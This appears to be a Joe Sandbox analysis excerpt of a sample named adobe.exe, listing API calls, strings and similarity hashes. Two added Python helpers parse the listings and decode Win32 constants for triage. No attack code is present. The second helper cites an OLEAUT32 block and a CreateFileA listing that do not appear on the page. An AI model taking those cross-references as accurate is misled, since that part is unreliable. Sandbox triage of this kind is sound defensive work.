• RegQueryValueExA.ADVAPI32(0045A38A,00000000,00000000,00000000,?,00000004,00000000,00453F83,?,0045A38A,00000000,00000000,?,00000000,?,00000000), ref: 00453F6C
Strings
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E10
• RegOpenKeyEx, xrefs: 00453E3C
• , xrefs: 00453E2A
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DD7
Similarity
• API ID: QueryValue$FormatMessageOpen
• String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
• API String ID: 2812809588-1577016196
• Opcode ID: e44d10270567a9c66430bb347a0a6bf6bb9a94d7d5836d51e5ed894c85649251
• Instruction ID: a80e1c39b7be5a0450aefd5b2d64ed399e87e9650e944d0b03df369acb03390b
• Opcode Fuzzy Hash: e44d10270567a9c66430bb347a0a6bf6bb9a94d7d5836d51e5ed894c85649251
• Instruction Fuzzy Hash: DF912371E04208ABDB11DF95D942BDFB7F8EB48746F10406BF900F7282D6789E498B69
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00458B84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458CC1,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458BD1
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458D1F
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458D89
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458DF0
Strings
• v1.1.4322, xrefs: 00458DE2
• SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458CD2
• v2.0.50727, xrefs: 00458D7B
• .NET Framework version %s not found, xrefs: 00458E29
• .NET Framework not found, xrefs: 00458E3D
• SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458DA3
• v4.0.30319, xrefs: 00458D11
• SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458D3C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$Open
                                                                                                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                                          • API String ID: 2976201327-446240816
                                                                                                                                                          • Opcode ID: e8abb9de601dfac2494a4b091894a856567b4a1817208a27788f0afb3686d769
                                                                                                                                                          • Instruction ID: 65063e084591066ce2e0c419d93be5946fd3b49884627cc027c606e1205e1d1a
                                                                                                                                                          • Opcode Fuzzy Hash: e8abb9de601dfac2494a4b091894a856567b4a1817208a27788f0afb3686d769
                                                                                                                                                          • Instruction Fuzzy Hash: 3051D331B041485BCB00DB65C861BEE77B6DB99305F14447FE841EB393DE399A0E8B59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0045829B
                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004582B7
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004582C5
                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?), ref: 004582D6
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045831D
                                                                                                                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458339
                                                                                                                                                          Strings
                                                                                                                                                          • Helper process exited., xrefs: 004582E5
                                                                                                                                                          • Helper process exited, but failed to get exit code., xrefs: 0045830F
                                                                                                                                                          • Helper isn't responding; killing it., xrefs: 004582A7
                                                                                                                                                          • Helper process exited with failure code: 0x%x, xrefs: 00458303
                                                                                                                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 0045828D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                                          • API String ID: 3355656108-1243109208
                                                                                                                                                          • Opcode ID: 009d5d7fe30976ddb6fc04617b2b071a5728475597fcbc42deffdd3f0bb584b8
                                                                                                                                                          • Instruction ID: dc7ec4cbf56dd0ff1cdd26c76f1a2b05d86ae8be78efecc4f770631db0154fcf
                                                                                                                                                          • Opcode Fuzzy Hash: 009d5d7fe30976ddb6fc04617b2b071a5728475597fcbc42deffdd3f0bb584b8
                                                                                                                                                          • Instruction Fuzzy Hash: 392141706047409AC720E7B9C44675B76D4AF48B05F048C6FFC99E7693DE79E8488B2A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
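
The blocks above and below are Joe Sandbox per-function summaries: one bullet per API call, with the stack arguments as the sandbox saw them (often more slots than the API takes, the surplus being stack residue), the call-site address after "ref:", and "Part of subcall function" prefixes for calls made one level down. What a triager actually wants from them is the call sequence with the constants decoded, for instance that the helper-process block waits 0x2710 = 10000 ms before TerminateProcess and sleeps 0xFA = 250 ms, or that the .NET-detection block opens its Policy keys under 0x80000002 = HKEY_LOCAL_MACHINE. The following Python parser is an added example written for this page; it is not part of the Joe Sandbox report or of the analysed sample. The sample lines are copied from the .NET-detection, helper-process, window and locale blocks on this page; the constant tables are fixed Win32 header values; the triage rules and the names parse_listing, triage and ApiCall are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function "APIs" bullets into a call sequence.

Added example for reading the listings on this page; not part of the
report or of the analysed sample. Only constants whose meaning is fixed by
the Win32 headers are decoded; everything else is left as a raw value.
"""
import re
from dataclasses import dataclass, field
from typing import Optional, Union

Arg = Union[int, str, None]  # hex immediate, literal text, or "?" (unknown)


@dataclass
class ApiCall:
    name: str      # API name, or a bare address when the sandbox could not name it
    module: str    # exporting module as printed (KERNEL32, ADVAPI32, USER32, ...)
    args: list     # argument slots in stack order, surplus slots included
    ref: int       # address of the call instruction
    caller: Optional[int] = None  # set for "Part of subcall function X" lines
    notes: list = field(default_factory=list)  # decoded constants


# One bullet line; the optional parenthesised argument list may contain
# unbalanced brackets from stack garbage, so it is anchored on the last ")"
# that precedes "ref:".  Lines ending in "xrefs:" (string references) do not
# match and are skipped.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
HEX8_RE = re.compile(r"^[0-9A-F]{8}$")

HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def flags(value: int, table) -> str:
    names = [n for bit, n in table if value & bit]
    return "|".join(names) if names else hex(value)


def ms(value: int) -> str:
    return "INFINITE" if value == 0xFFFFFFFF else f"{value} ms"


# (API name, argument slot) -> decoder for that slot.
DECODERS = {
    ("WaitForSingleObject", 1): ms,
    ("Sleep", 0): ms,
    ("RegOpenKeyExA", 0): lambda v: HKEY_ROOTS.get(v, hex(v)),
    ("CreateFileA", 1): lambda v: flags(v, GENERIC),
    ("CreateFileA", 4): lambda v: DISPOSITION.get(v, hex(v)),
    ("SetFileAttributesA", 1): lambda v: "FILE_ATTRIBUTE_NORMAL" if v == 0x80 else hex(v),
}


def parse_arg(tok: str) -> Arg:
    """'?' -> None, 8-digit hex -> int, anything else (paths, key names,
    format strings, stack garbage printed as text) -> the literal text.
    Arguments are comma separated; a literal containing a comma would be
    split, which the listings on this page never require."""
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX8_RE.match(tok):
        return int(tok, 16)
    return tok


def parse_listing(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers, string xrefs, blank lines
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        caller = int(m.group("caller"), 16) if m.group("caller") else None
        call = ApiCall(m.group("name"), m.group("module"), args,
                       int(m.group("ref"), 16), caller)
        for (api, idx), decode in DECODERS.items():
            if api == call.name and idx < len(args) and isinstance(args[idx], int):
                call.notes.append(f"arg{idx}={decode(args[idx])}")
        calls.append(call)
    return calls


def triage(calls: list) -> list:
    """Flag what a reviewer would want pulled out of the sequence."""
    findings = []
    for c in calls:
        if c.name == "GetProcAddress" and len(c.args) > 1 and isinstance(c.args[1], str):
            findings.append(f"{c.ref:08X}: dynamically resolved import {c.args[1]}")
        if not re.match(r"[A-Za-z_]", c.name):
            findings.append(f"{c.ref:08X}: call to unnamed address {c.name} in {c.module}")
    names = {c.name for c in calls}
    if {"WaitForSingleObject", "TerminateProcess"} <= names:
        findings.append("wait-then-kill pattern on a child process")
    return findings


# Constructed input: bullet lines copied from the function listings on this page.
SAMPLE = r"""
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458DF0
• v1.1.4322, xrefs: 00458DE2
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004582B7
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004582C5
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458339
• GetActiveWindow.USER32 ref: 00462224
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462245
• 73A25CF0.USER32(?,0049545B,00000000), ref: 0049544E
"""

if __name__ == "__main__":
    calls = parse_listing(SAMPLE)
    for c in calls:
        via = f" (via {c.caller:08X})" if c.caller else ""
        print(f"{c.ref:08X} {c.name}.{c.module}{via} {c.notes}")
    for f in triage(calls):
        print("!", f)
```

Run it on a copy of any block from this report and the decoded notes appear beside each call; the xrefs line in the sample is there to show that string references are ignored by the line pattern rather than misread as calls.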

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C2B,?,00000000,00453CEF), ref: 00453B7B
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C2B,?,00000000,00453CEF), ref: 00453CB7
                                                                                                                                                            • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528E3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                                                                                          Strings
                                                                                                                                                          • RegCreateKeyEx, xrefs: 00453AEF
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A93
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AC3
                                                                                                                                                          • , xrefs: 00453ADD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                          • API String ID: 2481121983-1280779767
                                                                                                                                                          • Opcode ID: 1c96cb360d357776079731774428d6af5218f8575bd7d68359ec7f43235e6ed0
                                                                                                                                                          • Instruction ID: 0ff8758d0f3d0f8af8441e1c96d3f3007b0bafa02c42e47a0c64eaf9a54c5f26
                                                                                                                                                          • Opcode Fuzzy Hash: 1c96cb360d357776079731774428d6af5218f8575bd7d68359ec7f43235e6ed0
                                                                                                                                                          • Instruction Fuzzy Hash: 31810076A00209AFDB01DFD5C941BDEB7B9EB48345F50442AF901F7282D778AA09CB69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00452F2C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045301B
                                                                                                                                                            • Part of subcall function 00452F2C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00495481,(rI,?,00000000,00453066), ref: 0045302B
                                                                                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049532D
                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00495481), ref: 0049534E
                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,00495490,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495375
                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,00494B08), ref: 00495388
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000,STATIC,00495490), ref: 004953B8
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049542C
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000), ref: 00495438
                                                                                                                                                            • Part of subcall function 0045327C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453363
                                                                                                                                                          • 73A25CF0.USER32(?,0049545B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495454,?,?,000000FC,00494B08,00000000,STATIC), ref: 0049544E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                                          • API String ID: 170458502-2312673372
                                                                                                                                                          • Opcode ID: a913bacd68a58272c035a82af8518fd51e71e9d51dfe920310d04365532cd433
                                                                                                                                                          • Instruction ID: 8708ddcb3c7e509e39ae52b682c63ff85e573034b813b33c283b53b7944ce28b
                                                                                                                                                          • Opcode Fuzzy Hash: a913bacd68a58272c035a82af8518fd51e71e9d51dfe920310d04365532cd433
                                                                                                                                                          • Instruction Fuzzy Hash: 32415470A40604AFDF01EBA5DC42F9E7BF8EB09704F614576F500FB292D6799E008BA8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CDF8,00000000), ref: 0042E369
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CDF8,00000000), ref: 0042E3BD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCloseHandleModuleProc
                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$}VE
                                                                                                                                                          • API String ID: 4190037839-505153273
                                                                                                                                                          • Opcode ID: 449d0e82435028d71b7d3d804bdb68d3fdc406a7c7eaefde65f99a221eb7a07a
                                                                                                                                                          • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                                                                                                          • Opcode Fuzzy Hash: 449d0e82435028d71b7d3d804bdb68d3fdc406a7c7eaefde65f99a221eb7a07a
                                                                                                                                                          • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetActiveWindow.USER32 ref: 00462224
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462238
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462245
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462252
• GetWindowRect.USER32(?,00000000), ref: 0046229E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004622DC
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
• Opcode ID: 7c2f70d3bf3664aadd6cc9b4ea22b92f8e7403f68fa1d74490619f0945ddb7ea
• Instruction ID: 76099a4312c52d0ccda9152c7cb495629c71abad9852ec9ac162fd6c7ff83c4b
• Opcode Fuzzy Hash: 7c2f70d3bf3664aadd6cc9b4ea22b92f8e7403f68fa1d74490619f0945ddb7ea
• Instruction Fuzzy Hash: BF21D775701B046BD310D664CD51F3B3395EB84714F08456AF984DB392EAB8DC008B9E
Uniqueness
Uniqueness Score: -1.00%
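
The listings above, and the CreateFileA listing later on this page, are raw call-site records. Because the sample resolves user32 and OLEAUT32 exports through GetModuleHandleA followed by GetProcAddress, those imports are absent from the static import table, and listings like these are where an analyst recovers them. The Python helper below is an added example written for this edit; it is not Joe Sandbox code and not code recovered from adobe.exe. It parses listing lines of the shape `• Api.MODULE(args), ref: address`, pairs each GetProcAddress with the export name in its second argument slot and the DLL most recently passed to GetModuleHandle*/LoadLibrary* in the same listing, and translates the access, share-mode and disposition slots of a CreateFileA call into their Win32 constant names. The sample input is copied from this report's own listings. Two caveats: the library attribution is a call-order heuristic (the hModule slot is a run-time value the report prints as 00000000), and the argument slots are stack values as seen at the call site, so they can include leftovers from neighbouring calls (the GetModuleHandleA line in the OLEAUT32 block shows eight slots for a one-argument API). Treat the output as triage leads to confirm in the disassembly.

```python
"""Triage helpers for Joe Sandbox "APIs" listings.

Added example for this report page; not Joe Sandbox code and not code from the
analysed sample.  Each listing line has the shape
    • <Api>.<MODULE>(<slot>,<slot>,...), ref: <hex call-site address>
where a slot is an 8-digit hex word, '?' for a value the analyser could not
recover, or a literal string such as a DLL or export name.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: lines copied from function blocks in this report.
SAMPLE_LISTING = """\
• GetActiveWindow.USER32 ref: 00462224
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462238
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462245
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462252
• GetWindowRect.USER32(?,00000000), ref: 0046229E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004622DC
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
  • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D), ref: 00452B0F
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_WORD = re.compile(r"^-?[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # argument slots exactly as printed
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines


def parse_listing(text: str) -> list:
    """Parse every API line in a listing; headings such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a != ""]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def is_literal(slot: str) -> bool:
    """True for a string slot (DLL or export name) rather than a hex word or '?'."""
    return slot != "?" and not HEX_WORD.match(slot)


def resolved_imports(calls: list) -> list:
    """Return (library, export, call-site) for each GetProcAddress.

    The library is the literal most recently handed to GetModuleHandle*/LoadLibrary*
    earlier in the same listing: a call-order heuristic, because the hModule slot
    is a run-time value that the report prints as 00000000."""
    lib = None
    found = []
    for c in calls:
        if c.api.startswith(("GetModuleHandle", "LoadLibrary")) and c.args and is_literal(c.args[0]):
            lib = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) >= 2 and is_literal(c.args[1]):
            found.append((lib, c.args[1], c.ref))
    return found


# Win32 CreateFile constants; the listing shows only the numeric values.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def _flags(value: int, table: dict) -> list:
    return [name for bit, name in table.items() if value & bit] or ["0"]


def decode_create_file(call: ApiCall) -> dict:
    """Name the dwDesiredAccess, dwShareMode and dwCreationDisposition slots
    (positions 1, 2 and 4) of a CreateFileA/W call."""
    if not call.api.startswith("CreateFile") or len(call.args) < 5:
        raise ValueError("not a CreateFile call with recovered arguments")
    if not all(HEX_WORD.match(call.args[i]) for i in (1, 2, 4)):
        raise ValueError("flag slots were not recovered as numeric values")
    access, share, disp = (int(call.args[i], 16) & 0xFFFFFFFF for i in (1, 2, 4))
    return {"access": _flags(access, ACCESS), "share": _flags(share, SHARE),
            "disposition": DISPOSITION.get(disp, hex(disp))}


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for lib, name, ref in resolved_imports(parsed):
        print(f"{ref:08X}: GetProcAddress -> {lib}!{name}")
    cf = next(c for c in parsed if c.api == "CreateFileA")
    print(decode_create_file(cf))
```

Paste a whole function block's APIs list into `parse_listing` to get the same output for it; lines that are not API records (headings, hashes, dump identifiers) are ignored, and the subcall address is kept on each nested entry so a resolved import can be attributed to the right function.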

APIs
• GetActiveWindow.USER32 ref: 0042F008
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
• GetWindowRect.USER32(?,00000000), ref: 0042F082
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
